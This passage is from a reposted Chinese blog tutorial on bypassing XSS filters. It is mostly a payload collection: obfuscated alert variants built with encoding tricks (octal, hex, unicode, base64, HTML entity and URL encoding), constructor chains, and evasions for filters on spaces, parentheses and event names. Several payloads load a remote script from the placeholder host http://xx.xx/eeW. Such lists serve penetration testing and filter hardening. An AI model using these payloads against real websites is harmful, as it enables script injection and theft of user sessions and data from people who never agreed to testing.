    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li><li style="color: rgb(153, 153, 153);">10</li><li style="color: rgb(153, 153, 153);">11</li></ul></pre> 
    <p><strong>top</strong></p> 
    <pre data-index="20" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src="x" onerror="top['al'+'ert'](1)">
    JS8编码:
    <details open ontoggle=top['al\145rt'](1) >
    <details open ontoggle=top['\141\154\145\162\164'](1) >
    JS16编码:
    <details open ontoggle=top['al\x65rt'](1) >
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li></ul></pre> 
    <p><strong>window</strong></p> 
    <pre data-index="21" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src="x" onerror="window['al'+'ert'](1)">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p><strong>self</strong></p> 
    <pre data-index="22" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src="x" onerror="self[`al`+`ert`](1)">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p><strong>parent</strong></p> 
    <pre data-index="23" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src="x" onerror="parent[`al`+`ert`](1)">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p><strong>frames</strong></p> 
    <pre data-index="24" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src="x" onerror="frames[`al`+`ert`](1)">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p><strong>setTimeout</strong></p> 
    <pre data-index="25" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><svg/onload=setTimeout('\x61\x6C\x65\x72\x74\x28\x31\x29')>
    <svg/onload=setTimeout('\141\154\145\162\164\050\061\051')>
    <svg/onload=setTimeout('\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029')>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li></ul></pre> 
    <p><strong>atob</strong><br> atob() 方法用于解码使用 base-64 编码的字符串</p> 
    <pre data-index="26" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src=x onerror="Function`a${atob`YWxlcnQoMSk=`}```">
    <img src=x onerror="``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> 
    <p><strong>parseInt()与toString()</strong><br> parseInt() 第二个参数会把第一个参数以第二个参数的进制来解析,第二个参数介于2-36之间,而 toString()可以将数值以任意进制还原成字符串<br> <img src="https://1000bd.com/contentImg/2024/03/16/124129030.png" alt="在这里插入图片描述"><br> 实际使用时建议先进行测试是否能还原</p> 
    <pre data-index="27" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><details open ontoggle=top[8680439..toString(30)](1); >
    <details open ontoggle=top[17795081..toString(36)](1); >
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> 
    <h4><a name="t8"></a><a id="payload_355"></a>一些函数使用payload收集</h4> 
    <pre data-index="28" class="set-code-hide prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">img src="x" onerror="eval(alert(1))">
    <img src="x" onerror="open(alert(1))">
    <img src="x" onerror="document.write(alert(1))">
    <img src="x" onerror="setTimeout(alert(1))">
    <img src="x" onerror="setInterval(alert(1))">
    <img src="x" onerror="Set.constructor(alert(1))">
    <img src="x" onerror="Map.constructor(alert(1))">
    <img src="x" onerror="Array.constructor(alert(1))">
    <img src="x" onerror="WeakSet.constructor(alert(1))">
    <img src="x" onerror="constructor.constructor(alert(1))">
    <img src="x" onerror="[1].map(alert(1))">
    <img src="x" onerror="[1].find(alert(1))">
    <img src="x" onerror="[1].every(alert(1))">
    <img src="x" onerror="[1].filter(alert(1))">
    <img src="x" onerror="[1].forEach(alert(1))">
    <img src="x" onerror="[1].findIndex(alert(1))">
    <img src onerror=_=alert,_(1)>
    <img src x=al y=ert onerror=top[x+y](1)>
    <img src onerror=top[a='al',b='ev',b+a]('alert(1)')>
    <img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><div class="hide-preCode-box"><span class="hide-preCode-bt" data-report-view="{"spm":"1001.2101.3001.7365"}"><img class="look-more-preCode contentImg-no-view" src="https://1000bd.com/contentImg/2022/06/27/191644837.png" alt="" title=""></span></div><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li><li style="color: rgb(153, 153, 153);">10</li><li style="color: rgb(153, 153, 153);">11</li><li style="color: rgb(153, 153, 153);">12</li><li style="color: rgb(153, 153, 153);">13</li><li style="color: rgb(153, 153, 153);">14</li><li style="color: rgb(153, 153, 153);">15</li><li style="color: rgb(153, 153, 153);">16</li><li style="color: rgb(153, 153, 153);">17</li><li style="color: rgb(153, 153, 153);">18</li><li style="color: rgb(153, 153, 153);">19</li><li style="color: rgb(153, 153, 153);">20</li></ul></pre> 
    <p><strong>setInterval</strong><br> setInterval与setTimeout差不多</p> 
    <pre data-index="29" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><svg/onload=setInterval('al'%2b'ert(1)')>
    <svg/onload=setInterval(appendChild(createElement('script')).src='http://xx.xx/eeW')>
    <svg/onload=\u0073etInterval(appendChild(createElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
    <svg/onload=\u0073etInterval(\u0061ppendChild(\u0063reateElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
    <iframe onload=s=createElement('script');body.appendChild(s);s.src=['http','://','xx.xx','/eeW'].join('') >
    <svg/onload=s=createElement('script');body.appendChild(s);s.src=['http']%2B['://']%2B['xx.xx']%2B['/eeW'].join('') >
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li></ul></pre> 
    <h2><a name="t9"></a><a id="_389"></a>浏览器编码问题</h2> 
    <p>浏览器对 XSS 代码的解析顺序为:HTML解码 —— URL解码 —— JS解码(只支持UNICODE)。</p> 
    <h3><a name="t10"></a><a id="XML_392"></a>XML实体编码</h3> 
    <pre data-index="30" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><a href="javascript:alert(1)">test</a>
    十进制
    <a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">test</a>
    十六进制
    <a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;">test</a>
    可以不带分号
    <a href="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29">test</a>
    可以填充0
    <a href="&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063&#x0072&#x0069&#x0070&#x0074&#x003a&#x0061&#x006c&#x0065&#x0072&#x0074&#x0028&#x0031&#x0029">test</a>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li></ul></pre> 
    <p><strong>XML实体编码不能对属性或者短标签进行编码,否则无法识别,可以对属性里面的内容进行编码</strong></p> 
    <h3><a name="t11"></a><a id="URL_406"></a>URL编码</h3> 
    <p>注入点存在 href 或者 src 属性时,可以使用 url 编码,但不能对属性进行编码。</p> 
    <pre data-index="31" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><a href="javascript:%61%6c%65%72%74%28%31%29">test</a>
    <iframe src="javascript:%61%6c%65%72%74%28%31%29">test</iframe>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> 
    <h3><a name="t12"></a><a id="JS_413"></a>JS编码</h3> 
    <p>在处理诸如<script> <style>这样的标签,解析器会自动切换到JS解析模式,而src、 href 后边加入的javascript 伪URL,也会进入JS 的解析模式,ON事件后面也会直接进入JS模式。JS编码解析时不能破坏javascript协议。</p> 
    <pre data-index="32" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">js 编码策略:
    
    “” 加上三个八进制数字,如果个数不够,前面补0,例如 “<” 编码为 “\074”
    “\x” 加上两个十六进制数字,如果个数不够,前面补0,例如 “<” 编码为 “\x3c”
    “\u” 加上四个十六进制数字,如果个数不够,前面补0,例如 “<” 编码为 “\u003c”
    对于一些控制字符,使用特殊的 C 类型的转义风格(例如 \n 和 \r)
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li></ul></pre> 
    <p>在进行JavaScript解析的时候字符或者字符串仅会被解码为字符串文本或者标识符名称,在上例中Javascript解析器工作的时候将\u0061\u006c\u0065\u0072\u0074进行解码后为alert,而alert是一个有效的标识符名称,它是能被正常解析的。像圆括号、双引号、单引号等等这些字符就只能被当作普通的文本,无法正常解析,因此编码时,禁止编码圆括号、双引号、单引号等等</p> 
    <p>如</p> 
    <pre data-index="33" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src=x onerror="alert(1)">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>编码为</p> 
    <pre data-index="34" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>但是下面这个是例外,可以全部编码</p> 
    <pre data-index="35" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><input onfocus=location="alert(1)" autofocus>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>可编码为</p> 
    <pre data-index="36" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><input onfocus=location="javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029" autofocus>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>可用下面的网站进行编码<br> https://tool.chinaz.com/tools/unicode.aspx</p> 
    <h3><a name="t13"></a><a id="_445"></a>混合编码</h3> 
    <p>浏览器对 XSS 代码的解析顺序为:HTML解码 —— URL解码 —— JS解码(只支持UNICODE),所以要混合编码需要和解析顺序相反进行编码</p> 
    <pre data-index="37" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><a href="javascript:alert(1)">test</a>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>JS编码后为</p> 
    <pre data-index="38" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><a href="javascript:\u0061\u006c\u0065\u0072\u0074(1)">test</a>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>url编码后为</p> 
    <pre data-index="39" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)">test</a>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>html实体编码后为</p> 
    <pre data-index="40" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x31;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x36;&#x33;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x35;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x32;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x34;&#x28;&#x31;&#x29;">test</a>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <h2><a name="t14"></a><a id="_466"></a>一些绕过方法</h2> 
    <h3><a name="t15"></a><a id="constructor_467"></a>利用constructor原型污染链构造弹框</h3> 
    <p>其根本原理是利用constructor原型污染链构造Function,使用Function来构造<strong>匿名函数</strong>,然后在其中写入任意的js代码进行执行,匿名函数后面加上一个括号即可立即执行</p> 
    <p>常规的js构造函数弹窗</p> 
    <pre data-index="41" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">let sayHi = new Function('alert("Hello")');
    sayHi(); 
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> 
    <p>写成一句话调用匿名函数</p> 
    <pre data-index="42" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">new Function('alert("Hello")')();
    //弹框
    //精简去掉 new 和 ;
    Function('alert("Hello")')()
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li></ul></pre> 
    <p>为了替换掉Function,我们用constructor构造<br> <img src="https://1000bd.com/contentImg/2024/03/16/124129022.png" alt="在这里插入图片描述"><br> 可以得到</p> 
    <pre data-index="43" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">String.constructor('alert("Hello")')()
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>再把string处理掉<br> <img src="https://1000bd.com/contentImg/2024/03/16/124129014.png" alt="在这里插入图片描述"><br> 可以得到</p> 
    <pre data-index="44" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">"".constructor.constructor("alert(1)")()
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>如果黑名单过滤了(),可以用反引号绕过</p> 
    <pre data-index="45" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">String.constructor`al\x65rt\x28/xss/\x29```
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>如果黑名单过滤了.可以再根据a.b与a[b]等价的定理进行变换</p> 
    <pre data-index="46" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">""["constructor"]["constructor"]("alert(1)")()
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>针对字符串,可以使用16进制,8进制转码,我们用8进制转码一下</p> 
    <pre data-index="47" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;">""["\163\165\142\163\164\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("\141\154\145\162\164\50\61\51")()
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>一些payload</p> 
    <pre data-index="48" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><svg/onload=Set.constructor(appendChild(createElement('script')).src='http://xx.xx/eeW')()>
    
    <svg/onload=Set.constructor`al\x65rt\x28/xss/\x29```>
    <svg/onload=Map.constructor`al\x65rt\x28/xss/\x29```>
    <svg/onload=clear.constructor`al\x65rt\x28/xss/\x29```>
    <svg/onload=Array.constructor`al\x65rt\x28/xss/\x29```>
    <svg/onload=WeakSet.constructor`al\x65rt\x28/xss/\x29```>
    
    <img src=x onerror="Function`a${atob`YWxlcnQoMSk=`}```">
    <img src=x onerror="``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li><li style="color: rgb(153, 153, 153);">3</li><li style="color: rgb(153, 153, 153);">4</li><li style="color: rgb(153, 153, 153);">5</li><li style="color: rgb(153, 153, 153);">6</li><li style="color: rgb(153, 153, 153);">7</li><li style="color: rgb(153, 153, 153);">8</li><li style="color: rgb(153, 153, 153);">9</li><li style="color: rgb(153, 153, 153);">10</li></ul></pre> 
    <h3><a name="t16"></a><a id="_521"></a>空格绕过</h3> 
    <p>可以利用 /和//还有/**/替换绕过空格</p> 
    <pre data-index="49" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img//src//onerror=alert(1)>
    <img/**/src/**/onerror=alert(1)>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> 
    <p>还可以throw 绕过</p> 
    <pre data-index="50" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><video src onerror="javascript:window.οnerrοr=alert;throw 1">
    <svg/onload="window.οnerrοr=eval;throw'=alert\x281\x29';">
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> 
    <h3><a name="t17"></a><a id="_532"></a>圆括号过滤绕过</h3> 
    <p>可以用斜杠替换</p> 
    <pre data-index="51" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src onerror=alert(/xss/)>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <p>还可以用反引号替换</p> 
    <pre data-index="52" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><img src onerror=alert(`xss`)>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li></ul></pre> 
    <h3><a name="t18"></a><a id="_541"></a>其他的一些绕过</h3> 
    <p>其他的一些绕过其实可以根据上面的知识,尝试大小写绕过,编码绕过,利用相似功能的函数进行绕过,拼接绕过等</p> 
    <p>下面这个是一个很典型的例子,第一条不行,发现是事件上了黑名单,换个事件即可</p> 
    <pre data-index="53" class="set-code-show prettyprint"><code class="has-numbering" onclick="mdcp.signin(event)" style="position: unset;"><a href="x" onmouseover="confirm('123');">xss</a>
    <a href="x" onMouseEnter="confirm('123');">aa</a>
    <div class="hljs-button signin active" data-title="登录复制" data-report-click="{"spm":"1001.2101.3001.4334"}"></div></code><ul class="pre-numbering" style="opacity: 0.0185847;"><li style="color: rgb(153, 153, 153);">1</li><li style="color: rgb(153, 153, 153);">2</li></ul></pre> 
    <h2><a name="t19"></a><a id="_549"></a>参考</h2> 
    <p>https://wooyun.js.org/drops/Bypass%20xss%E8%BF%87%E6%BB%A4%E7%9A%84%E6%B5%8B%E8%AF%95%E6%96%B9%E6%B3%95.html<br> https://blog.csdn.net/hackzkaq/article/details/126344040<br> https://www.ddosi.org/xss-bypass/#XSS_%E5%AE%9A%E4%BD%8D%E5%99%A8%EF%BC%88Polygot%EF%BC%89<br> http://www.0xby.com/98.html<br> https://xz.aliyun.com/t/6597<br> https://lalajun.github.io/2020/11/18/%E5%8D%81%E4%BA%8C%E4%B8%AAXSS%E6%A1%88%E4%BE%8B%E9%87%8D%E6%96%B0%E8%AE%A4%E8%AF%86XSS-%E4%B8%8A/</p>
                    </div>
                        </div>
                    </li>
    
                    <li class="list-group-item ul-li">
    
                        <b>相关阅读:</b><br>
                        <nobr>
    <a href="/Article/Index/887738">CF1114F Please, another Queries on Array?【线段树&#x2B;欧拉函数】</a>                            <br />
    <a href="/Article/Index/1360869">docker基本管理</a>                            <br />
    <a href="/Article/Index/670607">git如何生成ssh密钥 git生成配置ssh密钥key详细步骤</a>                            <br />
    <a href="/Article/Index/1503787">611. 有效三角形的个数 - 力扣</a>                            <br />
    <a href="/Article/Index/655452">解决方法:STM32使用cJSON解析数据失败</a>                            <br />
    <a href="/Article/Index/1268653">学习机器学习需要哪些数学知识?</a>                            <br />
    <a href="/Article/Index/1333139">Dart笔记:stream_channel 包用法</a>                            <br />
    <a href="/Article/Index/1191652">Redisson实现分布式锁原理、自动续期机制分析</a>                            <br />
    <a href="/Article/Index/1556202">Python实现将文件夹下的所有pdf文件合并成一个pdf文件,并用文件夹名字命名</a>                            <br />
    <a href="/Article/Index/1384136">校园智慧党建小程序源码系统 带完整的搭建教程</a>                            <br />
                        </nobr>
                    </li>
                    <li class="list-group-item from-a mb-2">
                        原文地址:https://blog.csdn.net/cjdgg/article/details/133255980
                    </li>
    
                </ul>
            </div>
    
            <div class="col-lg-4 col-sm-12">
                <ul class="list-group" style="word-break:break-all;">
                    <li class="list-group-item ul-li-bg" aria-current="true">
                        最新文章
                    </li>
                    <li class="list-group-item ul-li">
                        <nobr>
    <a href="/Article/Index/1484446">攻防演习之三天拿下官网站群</a>                            <br />
    <a href="/Article/Index/1515268">数据安全治理学习——前期安全规划和安全管理体系建设</a>                            <br />
    <a href="/Article/Index/1759065">企业安全 | 企业内一次钓鱼演练准备过程</a>                            <br />
    <a href="/Article/Index/1485036">内网渗透测试 | Kerberos协议及其部分攻击手法</a>                            <br />
    <a href="/Article/Index/1877332">0day的产生 | 不懂代码的&quot;代码审计&quot;</a>                            <br />
    <a href="/Article/Index/1887576">安装scrcpy-client模块av模块异常,环境问题解决方案</a>                            <br />
    <a href="/Article/Index/1887578">leetcode hot100【LeetCode 279. 完全平方数】java实现</a>                            <br />
    <a href="/Article/Index/1887512">OpenWrt下安装Mosquitto</a>                            <br />
    <a href="/Article/Index/1887520">AnatoMask论文汇总</a>                            <br />
    <a href="/Article/Index/1887496">【AI日记】24.11.01 LangChain、openai api和github copilot</a>                            <br />
                        </nobr>
                    </li>
                </ul>
    
                <ul class="list-group pt-2" style="word-break:break-all;">
                    <li class="list-group-item ul-li-bg" aria-current="true">
                        热门文章
                    </li>
                    <li class="list-group-item ul-li">
                        <nobr>
    <a href="/Article/Index/888177">十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!</a>                            <br />
    <a href="/Article/Index/797680">奉劝各位学弟学妹们,该打造你的技术影响力了!</a>                            <br />
    <a href="/Article/Index/888183">五年了,我在 CSDN 的两个一百万。</a>                            <br />
    <a href="/Article/Index/888179">Java俄罗斯方块,老程序员花了一个周末,连接中学年代!</a>                            <br />
    <a href="/Article/Index/797730">面试官都震惊,你这网络基础可以啊!</a>                            <br />
    <a href="/Article/Index/797725">你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法</a>                            <br />
    <a href="/Article/Index/797702">心情不好的时候,用 Python 画棵樱花树送给自己吧</a>                            <br />
